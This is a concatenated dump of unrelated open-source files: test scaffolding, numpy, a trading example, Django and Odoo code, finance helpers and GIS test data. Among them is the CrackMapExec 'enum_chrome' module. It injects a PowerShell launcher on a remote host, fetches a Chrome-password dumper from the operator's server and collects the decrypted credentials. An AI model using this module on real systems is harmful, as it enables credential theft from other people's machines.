self._currentRecordIndex = next(iterTracker)
except StopIteration:
break
# "Write" a dummy output value. This is used to test that the batched
# writing works properly
self._writePrediction(ModelResult(None, None, None, None))
periodic.tick()
# =========================================================================
# Compute wait times. See if model should exit
# =========================================================================
if self.__shouldSysExit(self._currentRecordIndex):
sys.exit(1)
# Simulate computation time
if self._busyWaitTime is not None:
time.sleep(self._busyWaitTime)
self.__computeWaitTime()
# Asked to abort after so many iterations?
if doSysExit:
sys.exit(1)
# Asked to raise a jobFailException?
if self._jobFailErr:
raise utils.JobFailException("E10000",
"dummyModel's jobFailErr was True.")
# =========================================================================
# Handle final operations
# =========================================================================
if self._doFinalize:
if not self._makeCheckpoint:
self._model = None
# Delay finalization operation
if self._finalDelay is not None:
time.sleep(self._finalDelay)
self._finalize()
self._logger.info("Finished: modelID=%r "% (self._modelID))
return (self._cmpReason, None)
def __computeWaitTime(self):
if self.randomizeWait is not None:
self._busyWaitTime = random.uniform((1.0-self.randomizeWait) * self._busyWaitTime,
(1.0+self.randomizeWait) * self._busyWaitTime)
def __createModel(self, expDir):
# -----------------------------------------------------------------------
# Load the experiment's description.py module
descriptionPyModule = opfhelpers.loadExperimentDescriptionScriptFromDir(
expDir)
expIface = opfhelpers.getExperimentDescriptionInterfaceFromModule(
descriptionPyModule)
# -----------------------------------------------------------------------
# Construct the model instance
modelDescription = expIface.getModelDescription()
return ModelFactory.create(modelDescription)
def _createPredictionLogger(self):
"""
Creates the model's PredictionLogger object, which is an interface to write
model results to a permanent storage location
"""
class DummyLogger:
def writeRecord(self, record): pass
def writeRecords(self, records, progressCB): pass
def close(self): pass
self._predictionLogger = DummyLogger()
def __shouldSysExit(self, iteration):
"""
Checks to see if the model should exit based on the exitAfter dummy
parameter
"""
if self._exitAfter is None \
or iteration < self._exitAfter:
return False
results = self._jobsDAO.modelsGetFieldsForJob(self._jobID, ['params'])
modelIDs = [e[0] for e in results]
modelNums = [json.loads(e[1][0])['structuredParams']['__model_num'] for e in results]
sameModelNumbers = filter(lambda x: x[1] == self.modelIndex,
zip(modelIDs, modelNums))
firstModelID = min(zip(*sameModelNumbers)[0])
return firstModelID == self._modelID
| agpl-3.0 |
mindw/numpy | numpy/ma/__init__.py | 76 | 1576 | """
=============
Masked Arrays
=============
Arrays sometimes contain invalid or missing data. When doing operations
on such arrays, we wish to suppress invalid values, which is the purpose masked
arrays fulfill (an example of typical use is given below).
For example, examine the following array:
>>> x = np.array([2, 1, 3, np.nan, 5, 2, 3, np.nan])
When we try to calculate the mean of the data, the result is undetermined:
>>> np.mean(x)
nan
The mean is calculated using roughly ``np.sum(x)/len(x)``, but since
any number added to ``NaN`` [1]_ produces ``NaN``, this doesn't work. Enter
masked arrays:
>>> m = np.ma.masked_array(x, np.isnan(x))
>>> m
masked_array(data = [2.0 1.0 3.0 -- 5.0 2.0 3.0 --],
mask = [False False False True False False False True],
fill_value=1e+20)
Here, we construct a masked array that suppress all ``NaN`` values. We
may now proceed to calculate the mean of the other values:
>>> np.mean(m)
2.6666666666666665
.. [1] Not-a-Number, a floating point value that is the result of an
invalid operation.
"""
from __future__ import division, absolute_import, print_function
__author__ = "Pierre GF Gerard-Marchant ($Author: jarrod.millman $)"
__version__ = '1.0'
__revision__ = "$Revision: 3473 $"
__date__ = '$Date: 2007-10-29 17:18:13 +0200 (Mon, 29 Oct 2007) $'
from . import core
from .core import *
from . import extras
from .extras import *
__all__ = ['core', 'extras']
__all__ += core.__all__
__all__ += extras.__all__
from numpy.testing import Tester
test = Tester().test
bench = Tester().bench
| bsd-3-clause |
darwinex/DarwinexLabs | tools/dwx_zeromq_connector/v2.0.1/EXAMPLES/TEMPLATE/STRATEGIES/coin_flip_traders_v1.0.py | 1 | 9700 | # -*- coding: utf-8 -*-
"""
coin_flip_traders.py
An example trading strategy created using the Darwinex ZeroMQ Connector
for Python 3 and MetaTrader 4.
Source code:
https://github.com/darwinex/DarwinexLabs/tree/master/tools/dwx_zeromq_connector
The strategy launches 'n' threads (each representing a trader responsible
for trading one instrument)
Each trader must:
1) Execute a maximum of 1 trade at any given time.
2) Close existing trades after they have been in execution for
5 seconds.
3) Flip a coin - random.randombits(1) - to decide on a BUY or SELL
4) Keep trading until the market is closed (_market_open = False)
--
@author: Darwinex Labs (www.darwinex.com)
Copyright (c) 2019 onwards, Darwinex. All rights reserved.
Licensed under the BSD 3-Clause License, you may not use this file except
in compliance with the License.
You may obtain a copy of the License at:
https://opensource.org/licenses/BSD-3-Clause
"""
import os
#############################################################################
#############################################################################
_path = '<PATH_TO_ROOT_DIR_CONTAINING_DWX_ZEROMQ_CONNECTOR>'
os.chdir(_path)
#############################################################################
#############################################################################
from EXAMPLES.TEMPLATE.STRATEGIES.BASE.DWX_ZMQ_Strategy import DWX_ZMQ_Strategy
from pandas import Timedelta, to_datetime
from threading import Thread, Lock
from time import sleep
import random
class coin_flip_traders(DWX_ZMQ_Strategy):
def __init__(self, _name="COIN_FLIP_TRADERS",
_symbols=[('EURUSD',0.01),
('AUDNZD',0.01),
('GBPUSD',0.01),
('USDJPY',0.01),
('AUDUSD',0.01),
('XTIUSD',0.01),
('GBPJPY',0.01),
('NZDCHF',0.01),
('EURCAD',0.01)],
_delay=0.1,
_broker_gmt=3,
_verbose=False,
_max_trades=1,
_close_t_delta=5):
super().__init__(_name,
_symbols,
_broker_gmt,
_verbose)
# This strategy's variables
self._traders = []
self._market_open = True
self._max_trades = _max_trades
self._close_t_delta = _close_t_delta
self._delay = _delay
self._verbose = _verbose
# lock for acquire/release of ZeroMQ connector
self._lock = Lock()
##########################################################################
def _run_(self):
"""
Logic:
For each symbol in self._symbols:
1) Open a new Market Order every 2 seconds
2) Close any orders that have been running for 10 seconds
3) Calculate Open P&L every second
4) Plot Open P&L in real-time
5) Lot size per trade = 0.01
6) SL/TP = 10 pips each
"""
# Launch traders!
for _symbol in self._symbols:
_t = Thread(name="{}_Trader".format(_symbol[0]),
target=self._trader_, args=(_symbol,self._max_trades))
_t.daemon = True
_t.start()
print('[{}_Trader] Alright, here we go.. Gerrrronimooooooooooo! ..... xD'.format(_symbol[0]))
self._traders.append(_t)
print('\n\n+--------------+\n+ LIVE UPDATES +\n+--------------+\n')
# _verbose can print too much information.. so let's start a thread
# that prints an update for instructions flowing through ZeroMQ
self._updater_ = Thread(name='Live_Updater',
target=self._updater_,
args=(self._delay,))
self._updater_.daemon = True
self._updater_.start()
##########################################################################
def _updater_(self, _delay=0.1):
while self._market_open:
try:
# Acquire lock
self._lock.acquire()
print('\r{}'.format(str(self._zmq._get_response_())), end='', flush=True)
finally:
# Release lock
self._lock.release()
sleep(self._delay)
##########################################################################
def _trader_(self, _symbol, _max_trades):
# Note: Just for this example, only the Order Type is dynamic.
_default_order = self._zmq._generate_default_order_dict()
_default_order['_symbol'] = _symbol[0]
_default_order['_lots'] = _symbol[1]
_default_order['_SL'] = _default_order['_TP'] = 100
_default_order['_comment'] = '{}_Trader'.format(_symbol[0])
"""
Default Order:
--
{'_action': 'OPEN',
'_type': 0,
'_symbol': EURUSD,
'_price':0.0,
'_SL': 100, # 10 pips
'_TP': 100, # 10 pips
'_comment': 'EURUSD_Trader',
'_lots': 0.01,
'_magic': 123456}
"""
while self._market_open:
try:
# Acquire lock
self._lock.acquire()
#############################
# SECTION - GET OPEN TRADES #
#############################
_ot = self._reporting._get_open_trades_('{}_Trader'.format(_symbol[0]),
self._delay,
10)
# Reset cycle if nothing received
if self._zmq._valid_response_(_ot) == False:
continue
###############################
# SECTION - CLOSE OPEN TRADES #
###############################
for i in _ot.index:
if abs((Timedelta((to_datetime('now') + Timedelta(self._broker_gmt,'h')) - to_datetime(_ot.at[i,'_open_time'])).total_seconds())) > self._close_t_delta:
_ret = self._execution._execute_({'_action': 'CLOSE',
'_ticket': i,
'_comment': '{}_Trader'.format(_symbol[0])},
self._verbose,
self._delay,
10)
# Reset cycle if nothing received
if self._zmq._valid_response_(_ret) == False:
break
# Sleep between commands to MetaTrader
sleep(self._delay)
##############################
# SECTION - OPEN MORE TRADES #
##############################
if _ot.shape[0] < _max_trades:
# Randomly generate 1 (OP_BUY) or 0 (OP_SELL)
# using random.getrandbits()
_default_order['_type'] = random.getrandbits(1)
# Send instruction to MetaTrader
_ret = self._execution._execute_(_default_order,
self._verbose,
self._delay,
10)
# Reset cycle if nothing received
if self._zmq._valid_response_(_ret) == False:
continue
finally:
# Release lock
self._lock.release()
# Sleep between cycles
sleep(self._delay)
##########################################################################
def _stop_(self):
self._market_open = False
for _t in self._traders:
# Setting _market_open to False will stop each "trader" thread
# from doing anything more. So wait for them to finish.
_t.join()
print('\n[{}] .. and that\'s a wrap! Time to head home.\n'.format(_t.getName()))
# Kill the updater too
self._updater_.join()
print('\n\n{} .. wait for me.... I\'m going home too! xD\n'.format(self._updater_.getName()))
# Send mass close instruction to MetaTrader in case anything's left.
self._zmq._DWX_MTX_CLOSE_ALL_TRADES_()
##########################################################################
| bsd-3-clause |
seslattery/django-sample-app | djtut2/polls/migrations/0001_initial.py | 1 | 1891 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Poll'
db.create_table('polls_poll', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('question', self.gf('django.db.models.fields.CharField')(max_length=200)),
))
db.send_create_signal('polls', ['Poll'])
# Adding model 'Choice'
db.create_table('polls_choice', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('poll', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['polls.Poll'])),
('choice', self.gf('django.db.models.fields.CharField')(max_length=200)),
('votes', self.gf('django.db.models.fields.IntegerField')()),
))
db.send_create_signal('polls', ['Choice'])
def backwards(self, orm):
# Deleting model 'Poll'
db.delete_table('polls_poll')
# Deleting model 'Choice'
db.delete_table('polls_choice')
models = {
'polls.choice': {
'Meta': {'object_name': 'Choice'},
'choice': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'poll': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['polls.Poll']"}),
'votes': ('django.db.models.fields.IntegerField', [], {})
},
'polls.poll': {
'Meta': {'object_name': 'Poll'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'question': ('django.db.models.fields.CharField', [], {'max_length': '200'})
}
}
complete_apps = ['polls'] | bsd-3-clause |
shingonoide/odoo | addons/hr_holidays/report/__init__.py | 442 | 1129 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import holidays_summary_report
import available_holidays
import hr_holidays_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
byt3bl33d3r/CrackMapExec | cme/modules/enum_chrome.py | 2 | 2357 | from cme.helpers.powershell import *
from cme.helpers.logger import write_log
from datetime import datetime
from io import StringIO
class CMEModule:
'''
Executes Get-ChromeDump to decrypt saved chrome credentials
Module by @byt3bl33d3r
'''
name = 'enum_chrome'
description = "Decrypts saved Chrome passwords using Get-ChromeDump"
supported_protocols = ['smb', 'mssql']
opsec_safe = False
multiple_hosts = True
def options(self, context, module_options):
'''
'''
self.ps_script1 = obfs_ps_script('cme_powershell_scripts/Invoke-PSInject.ps1')
self.ps_script2 = obfs_ps_script('randomps-scripts/Get-ChromeDump.ps1')
def on_admin_login(self, context, connection):
command = 'Get-ChromeDump | Out-String'
chrome_cmd = gen_ps_iex_cradle(context, 'Get-ChromeDump.ps1', command)
launcher = gen_ps_inject(chrome_cmd, context)
connection.ps_execute(launcher)
context.log.success('Executed payload')
def on_request(self, context, request):
if 'Invoke-PSInject.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
request.wfile.write(self.ps_script1)
elif 'Get-ChromeDump.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
request.wfile.write(self.ps_script2)
else:
request.send_response(404)
request.end_headers()
def on_response(self, context, response):
response.send_response(200)
response.end_headers()
length = int(response.headers.get('content-length'))
data = response.rfile.read(length).decode()
#We've received the response, stop tracking this host
response.stop_tracking_host()
if len(data):
buf = StringIO(data).readlines()
for line in buf:
context.log.highlight(line)
log_name = 'ChromeDump-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(data, log_name)
context.log.info("Saved raw Get-ChromeDump output to {}".format(log_name))
#def on_shutdown(self, context):
#context.info('Removing SQLite assembly file')
#connection.ps_execute('') | bsd-2-clause |
brillliantz/Quantitative_Finance | Initialize_module_part.py | 1 | 6448 | import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
# import matplotlib.finance as mf
from matplotlib.widgets import MultiCursor
import statsmodels.tsa.stattools as stt
# import scipy.signal as sgn
import statsmodels.api as sm
# from statsmodels.sandbox.regression.predstd import wls_prediction_std
# from matplotlib.mlab import PCA
from collections import defaultdict
#------------------------------------------------
'''Some time length'''
night_len = int(4*3600*2.5)
mor_len = int(4*3600*2.25)
aftn_len = int(4*3600*1.5)
day_len = night_len + mor_len + aftn_len + 4
#-----------------------------------------------
'''add columns'''
def AddCol(df):
vol = df.ix[:, 'volume'].diff()
# this addition is for the convenience of Log y scale plot
# vol +=1
vol = vol.rename('vol_diff')
openint = df.ix[:, 'openInterest'].diff()
# this addition is for the convenience of Log y scale plot
# openint += 1
openint = openint.rename('openInt_diff')
mid = (df.ix[:, 'askPrc_0'] + df.ix[:, 'bidPrc_0']) / 2.
mid = mid.rename('midPrc')
ret = df.join([vol, openint, mid])
return ret
# -------------------------------------------------
def ForwardDiff(df, n=1):
"""Calculate the difference of value after n rows.
Parameters
----------
df : pandas DataFrame
n : int
Returns
-------
ret : DataFrame.
"""
ret = df.diff(periods=n)
ret = ret.shift(periods= -1 * n)
ret = ret.dropna()
return ret
def CutHighVar(df, length=200):
'''
Purpose: Cut a small period after opening in the morning and at night.
Because this time range, the var of price is high, which harmd our model.
df: pd.DataFrame or pd.Series. With datetime index
length: int. the length you want to cut, counted in ticks. Cannot be larger than 240
'''
ret = df
bool_arr1 = np.logical_or(ret.index.hour == 21, ret.index.hour == 9)
bool_arr = np.logical_and.reduce([bool_arr1,
ret.index.minute == 0,
ret.index.second <= int(length//4) - 1])
ret = ret[np.logical_not(bool_arr)]
return ret
def CutTail(df, length=60):
'''
Purpose: Cut a small period before market close.
df: pd.DataFrame or pd.Series. With datetime index
length: int. the length you want to cut, counted in ticks. Cannot be larger than 240
'''
ret = df
last_boolean1 = np.logical_and.reduce(
[ret.index.hour == 14,
ret.index.minute == 59,
ret.index.second >= 60 - int(length//4)])
# this is the last tick
last_boolean2 = ret.index.hour == 15
ret = ret[np.logical_not(np.logical_or(last_boolean1, last_boolean2))]
return ret
def DayChangeNum(ser, distance=7):
'''
ser is price move series after process.
distance counting in hours
'''
h = ser.index.hour
h_diff = np.diff(h)
h_diff = np.insert(h_diff, 1, 0)
ret = np.where(np.abs(h_diff) > distance)[0]
return ret
# def NormPriceMove(ser, daychgnum):
# ret = ser.copy()
# for i in range(len(daychgnum) - 1):
# mysamp = ret.iloc[daychgnum[i]: daychgnum[i+1]]
# #print mysamp
# mystd = mysamp.std()
# print mystd
# ret.iloc[daychgnum[i]: daychgnum[i+1]] /= mystd
# return ret
def CuthlLimit(df, forward=60, backward=100, how='all', depth=0):
"""Cut those reach high low Limit, including an extended length around them
Parameters
----------
df : Original DataFrame including all level quote infomation
forward : forward_ticks of price move
backward : sample length needed to generate an indicator
how : only consider highLimit, lowLimit or allLimit
depth : consider price which level quote reach high low Limit
Returns
-------
ret : selected boolean array
"""
extend_len = 2 * max([forward, backward]) + 1
s1 = 'bidQty_' + str(depth)
s2 = 'askQty_' + str(depth)
if how == 'all':
arr1 = df.ix[:, s1] == 0
arr2 = df[s2] == 0
bool_arr = np.logical_or(arr1, arr2)
#bool_arr = np.logical_or(df[s1] == 0, df[s2] == 0)
elif how == 'bid':
bool_arr = (df[s1] == 0)
elif how == 'ask':
bool_arr = (df[s2] == 0)
else:
print 'ERROR!'
float_arr = bool_arr.astype(float)
float_arr_diffusion = pd.Series(data=float_arr).rolling(window=extend_len, center=True).mean()
dicard_arr = float_arr_diffusion.fillna(value=1.).astype(bool)
return np.logical_not(dicard_arr)
def GiveMePM(df, nforward=60, nbackward=100, lim=[0, 30], cutdepth=0, norm=False, high_var_length=200):
"""from original DataFrame calculate price move Series,
including CutTail and CutHighVar.
Parameters
----------
df : the Original DataFrame.
forward : forward_ticks of price move
backward : sample length needed to generate an indicator
n : forward_ticks
lim : can be like (0, 20), counting in days, or an int array of index.
norm : if True, normalize the price move using every day std.
Returns
-------
ret : price move series.
"""
global day_len
if len(lim) == 2:
samp = df.ix[day_len*lim[0]: day_len*lim[1], 'midPrc']
else:
samp = df.ix[lim, 'midPrc']
#print 'samp'
ret = ForwardDiff(samp, nforward)
#print 'ForwardDiff'
# ret = CuthlLimit(ret, how='all', depth=cutdepth).loc[:, 'midPrc']
# #print 'CuthlLimit'
ret = CutTail(ret, nforward)
#print 'CutTail'
cut_head_length = max([high_var_length, nbackward])
ret = CutHighVar(ret, length=cut_head_length)
#print 'CutHighVar'
# if norm:
# ret_daychangenum = DayChangeNum(ret)
# ret = NormPriceMove(ret, ret_daychangenum)
selected_arr = CuthlLimit(df, forward=nforward, backward=nbackward, how='all', depth=cutdepth)
return ret[selected_arr].dropna()
def GiveMeIndex(arri, arro):
'''
Generate integer index
arr is a two dim ndarray, with each element being a time range(counting in days).
'''
global day_len
index_in = list()
for k in arri:
index_in = index_in + list(range(day_len * k[0], day_len * k[1]))
index_out = list()
for k in arro:
index_out = index_out + list(range(day_len * k[0], day_len * k[1]))
return index_in, index_out
| cc0-1.0 |
open-synergy/account-financial-tools | currency_rate_update/services/update_service_CA_BOC.py | 6 | 4260 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2009 CamptoCamp. All rights reserved.
# @author Nicolas Bessi
#
# Abstract class to fetch rates from Bank of Canada
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from .currency_getter_interface import Currency_getter_interface
from openerp import _
from openerp.exceptions import except_orm
import logging
_logger = logging.getLogger(__name__)
class CA_BOC_getter(Currency_getter_interface):
"""Implementation of Curreny_getter_factory interface
for Bank of Canada RSS service
"""
def get_updated_currency(self, currency_array, main_currency,
max_delta_days):
"""implementation of abstract method of Curreny_getter_interface"""
# as of Jan 2014 BOC is publishing noon rates for about 60 currencies
# currency codes in the XML file have the suffix "_NOON" or "_CLOSE" as
# of April 2015
url = ('http://www.bankofcanada.ca/stats/assets/'
'rates_rss/noon/en_%s.xml')
# closing rates are available as well (please note there are only 12
# currencies reported):
# http://www.bankofcanada.ca/stats/assets/rates_rss/closing/en_%s.xml
# We do not want to update the main currency
if main_currency in currency_array:
currency_array.remove(main_currency)
import feedparser
import pytz
from dateutil import parser
for curr in currency_array:
_logger.debug("BOC currency rate service : connecting...")
dom = feedparser.parse(url % curr)
self.validate_cur(curr)
# check if BOC service is running
if dom.bozo and dom.status != 404:
_logger.error("Bank of Canada - service is down - try again\
later...")
# check if BOC sent a valid response for this currency
if dom.status != 200:
_logger.error("Exchange data for %s is not reported by Bank\
of Canada." % curr)
raise except_orm(_('Error !'), _('Exchange data for %s is not '
'reported by Bank of Canada.'
% str(curr)))
_logger.debug("BOC sent a valid RSS file for: " + curr)
# check for valid exchange data
if (dom.entries[0].cb_basecurrency == main_currency) and \
(dom.entries[0].cb_targetcurrency[:3] == curr):
rate = dom.entries[0].cb_exchangerate.split('\n', 1)[0]
rate_date_datetime = parser.parse(dom.entries[0].updated)\
.astimezone(pytz.utc).replace(tzinfo=None)
self.check_rate_date(rate_date_datetime, max_delta_days)
self.updated_currency[curr] = rate
_logger.debug("BOC Rate retrieved : %s = %s %s" %
(main_currency, rate, curr))
else:
_logger.error(
"Exchange data format error for Bank of Canada -"
"%s. Please check provider data format "
"and/or source code." % curr)
raise except_orm(_('Error !'),
_('Exchange data format error for '
'Bank of Canada - %s !' % str(curr)))
return self.updated_currency, self.log_info
| agpl-3.0 |
ryano144/intellij-community | python/lib/Lib/site-packages/django/contrib/gis/tests/geometries.py | 90 | 33343 | import re
wkt_regex = re.compile(r'^(?P<type>[A-Z]+) ?\(')
class TestGeom:
"The Test Geometry class container."
def __init__(self, wkt, **kwargs):
self.wkt = wkt
self.bad = kwargs.pop('bad', False)
if not self.bad:
m = wkt_regex.match(wkt)
if not m:
raise Exception('Improper WKT: "%s"' % wkt)
self.geo_type = m.group('type')
for key, value in kwargs.items():
setattr(self, key, value)
# For the old tests
swig_geoms = (TestGeom('POLYGON ((0 0, 0 100, 100 100, 100 0, 0 0))', ncoords=5),
TestGeom('POLYGON ((0 0, 0 100, 100 100, 100 0, 0 0), (10 10, 10 90, 90 90, 90 10, 10 10) ))', ncoords=10),
)
# Testing WKT & HEX
hex_wkt = (TestGeom('POINT(0 1)', hex='01010000000000000000000000000000000000F03F'),
TestGeom('LINESTRING(0 1, 2 3, 4 5)', hex='0102000000030000000000000000000000000000000000F03F0000000000000040000000000000084000000000000010400000000000001440'),
TestGeom('POLYGON((0 0, 10 0, 10 10, 0 10, 0 0))', hex='010300000001000000050000000000000000000000000000000000000000000000000024400000000000000000000000000000244000000000000024400000000000000000000000000000244000000000000000000000000000000000'),
TestGeom('MULTIPOINT(0 0, 10 0, 10 10, 0 10, 0 0)', hex='010400000005000000010100000000000000000000000000000000000000010100000000000000000024400000000000000000010100000000000000000024400000000000002440010100000000000000000000000000000000002440010100000000000000000000000000000000000000'),
TestGeom('MULTILINESTRING((0 0, 10 0, 10 10, 0 10),(20 20, 30 20))', hex='01050000000200000001020000000400000000000000000000000000000000000000000000000000244000000000000000000000000000002440000000000000244000000000000000000000000000002440010200000002000000000000000000344000000000000034400000000000003E400000000000003440'),
TestGeom('MULTIPOLYGON(((0 0, 10 0, 10 10, 0 10, 0 0)),((20 20, 20 30, 30 30, 30 20, 20 20),(25 25, 25 26, 26 26, 26 25, 25 25)))', hex='010600000002000000010300000001000000050000000000000000000000000000000000000000000000000024400000000000000000000000000000244000000000000024400000000000000000000000000000244000000000000000000000000000000000010300000002000000050000000000000000003440000000000000344000000000000034400000000000003E400000000000003E400000000000003E400000000000003E40000000000000344000000000000034400000000000003440050000000000000000003940000000000000394000000000000039400000000000003A400000000000003A400000000000003A400000000000003A40000000000000394000000000000039400000000000003940'),
TestGeom('GEOMETRYCOLLECTION(MULTIPOLYGON(((0 0, 10 0, 10 10, 0 10, 0 0)),((20 20, 20 30, 30 30, 30 20, 20 20),(25 25, 25 26, 26 26, 26 25, 25 25))),MULTILINESTRING((0 0, 10 0, 10 10, 0 10),(20 20, 30 20)),MULTIPOINT(0 0, 10 0, 10 10, 0 10, 0 0))', hex='010700000003000000010600000002000000010300000001000000050000000000000000000000000000000000000000000000000024400000000000000000000000000000244000000000000024400000000000000000000000000000244000000000000000000000000000000000010300000002000000050000000000000000003440000000000000344000000000000034400000000000003E400000000000003E400000000000003E400000000000003E40000000000000344000000000000034400000000000003440050000000000000000003940000000000000394000000000000039400000000000003A400000000000003A400000000000003A400000000000003A4000000000000039400000000000003940000000000000394001050000000200000001020000000400000000000000000000000000000000000000000000000000244000000000000000000000000000002440000000000000244000000000000000000000000000002440010200000002000000000000000000344000000000000034400000000000003E400000000000003440010400000005000000010100000000000000000000000000000000000000010100000000000000000024400000000000000000010100000000000000000024400000000000002440010100000000000000000000000000000000002440010100000000000000000000000000000000000000'),
)
# WKT, GML, KML output
wkt_out = (TestGeom('POINT (110 130)', ewkt='POINT (110.0000000000000000 130.0000000000000000)', kml='<Point><coordinates>110.0,130.0,0</coordinates></Point>', gml='<gml:Point><gml:coordinates>110,130</gml:coordinates></gml:Point>'),
TestGeom('LINESTRING (40 40,50 130,130 130)', ewkt='LINESTRING (40.0000000000000000 40.0000000000000000, 50.0000000000000000 130.0000000000000000, 130.0000000000000000 130.0000000000000000)', kml='<LineString><coordinates>40.0,40.0,0 50.0,130.0,0 130.0,130.0,0</coordinates></LineString>', gml='<gml:LineString><gml:coordinates>40,40 50,130 130,130</gml:coordinates></gml:LineString>'),
TestGeom('POLYGON ((150 150,410 150,280 20,20 20,150 150),(170 120,330 120,260 50,100 50,170 120))', ewkt='POLYGON ((150.0000000000000000 150.0000000000000000, 410.0000000000000000 150.0000000000000000, 280.0000000000000000 20.0000000000000000, 20.0000000000000000 20.0000000000000000, 150.0000000000000000 150.0000000000000000), (170.0000000000000000 120.0000000000000000, 330.0000000000000000 120.0000000000000000, 260.0000000000000000 50.0000000000000000, 100.0000000000000000 50.0000000000000000, 170.0000000000000000 120.0000000000000000))', kml='<Polygon><outerBoundaryIs><LinearRing><coordinates>150.0,150.0,0 410.0,150.0,0 280.0,20.0,0 20.0,20.0,0 150.0,150.0,0</coordinates></LinearRing></outerBoundaryIs><innerBoundaryIs><LinearRing><coordinates>170.0,120.0,0 330.0,120.0,0 260.0,50.0,0 100.0,50.0,0 170.0,120.0,0</coordinates></LinearRing></innerBoundaryIs></Polygon>', gml='<gml:Polygon><gml:outerBoundaryIs><gml:LinearRing><gml:coordinates>150,150 410,150 280,20 20,20 150,150</gml:coordinates></gml:LinearRing></gml:outerBoundaryIs><gml:innerBoundaryIs><gml:LinearRing><gml:coordinates>170,120 330,120 260,50 100,50 170,120</gml:coordinates></gml:LinearRing></gml:innerBoundaryIs></gml:Polygon>'),
TestGeom('MULTIPOINT (10 80,110 170,110 120)', ewkt='MULTIPOINT (10.0000000000000000 80.0000000000000000, 110.0000000000000000 170.0000000000000000, 110.0000000000000000 120.0000000000000000)', kml='<MultiGeometry><Point><coordinates>10.0,80.0,0</coordinates></Point><Point><coordinates>110.0,170.0,0</coordinates></Point><Point><coordinates>110.0,120.0,0</coordinates></Point></MultiGeometry>', gml='<gml:MultiPoint><gml:pointMember><gml:Point><gml:coordinates>10,80</gml:coordinates></gml:Point></gml:pointMember><gml:pointMember><gml:Point><gml:coordinates>110,170</gml:coordinates></gml:Point></gml:pointMember><gml:pointMember><gml:Point><gml:coordinates>110,120</gml:coordinates></gml:Point></gml:pointMember></gml:MultiPoint>'),
TestGeom('MULTILINESTRING ((110 100,40 30,180 30),(170 30,110 90,50 30))', ewkt='MULTILINESTRING ((110.0000000000000000 100.0000000000000000, 40.0000000000000000 30.0000000000000000, 180.0000000000000000 30.0000000000000000), (170.0000000000000000 30.0000000000000000, 110.0000000000000000 90.0000000000000000, 50.0000000000000000 30.0000000000000000))', kml='<MultiGeometry><LineString><coordinates>110.0,100.0,0 40.0,30.0,0 180.0,30.0,0</coordinates></LineString><LineString><coordinates>170.0,30.0,0 110.0,90.0,0 50.0,30.0,0</coordinates></LineString></MultiGeometry>', gml='<gml:MultiLineString><gml:lineStringMember><gml:LineString><gml:coordinates>110,100 40,30 180,30</gml:coordinates></gml:LineString></gml:lineStringMember><gml:lineStringMember><gml:LineString><gml:coordinates>170,30 110,90 50,30</gml:coordinates></gml:LineString></gml:lineStringMember></gml:MultiLineString>'),
TestGeom('MULTIPOLYGON (((110 110,70 200,150 200,110 110),(110 110,100 180,120 180,110 110)),((110 110,150 20,70 20,110 110),(110 110,120 40,100 40,110 110)))', ewkt='MULTIPOLYGON (((110.0000000000000000 110.0000000000000000, 70.0000000000000000 200.0000000000000000, 150.0000000000000000 200.0000000000000000, 110.0000000000000000 110.0000000000000000), (110.0000000000000000 110.0000000000000000, 100.0000000000000000 180.0000000000000000, 120.0000000000000000 180.0000000000000000, 110.0000000000000000 110.0000000000000000)), ((110.0000000000000000 110.0000000000000000, 150.0000000000000000 20.0000000000000000, 70.0000000000000000 20.0000000000000000, 110.0000000000000000 110.0000000000000000), (110.0000000000000000 110.0000000000000000, 120.0000000000000000 40.0000000000000000, 100.0000000000000000 40.0000000000000000, 110.0000000000000000 110.0000000000000000)))', kml='<MultiGeometry><Polygon><outerBoundaryIs><LinearRing><coordinates>110.0,110.0,0 70.0,200.0,0 150.0,200.0,0 110.0,110.0,0</coordinates></LinearRing></outerBoundaryIs><innerBoundaryIs><LinearRing><coordinates>110.0,110.0,0 100.0,180.0,0 120.0,180.0,0 110.0,110.0,0</coordinates></LinearRing></innerBoundaryIs></Polygon><Polygon><outerBoundaryIs><LinearRing><coordinates>110.0,110.0,0 150.0,20.0,0 70.0,20.0,0 110.0,110.0,0</coordinates></LinearRing></outerBoundaryIs><innerBoundaryIs><LinearRing><coordinates>110.0,110.0,0 120.0,40.0,0 100.0,40.0,0 110.0,110.0,0</coordinates></LinearRing></innerBoundaryIs></Polygon></MultiGeometry>', gml='<gml:MultiPolygon><gml:polygonMember><gml:Polygon><gml:outerBoundaryIs><gml:LinearRing><gml:coordinates>110,110 70,200 150,200 